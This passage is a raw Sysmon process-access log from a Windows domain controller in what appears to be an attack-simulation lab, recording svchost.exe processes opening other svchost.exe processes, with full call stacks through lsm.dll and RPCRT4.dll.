12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 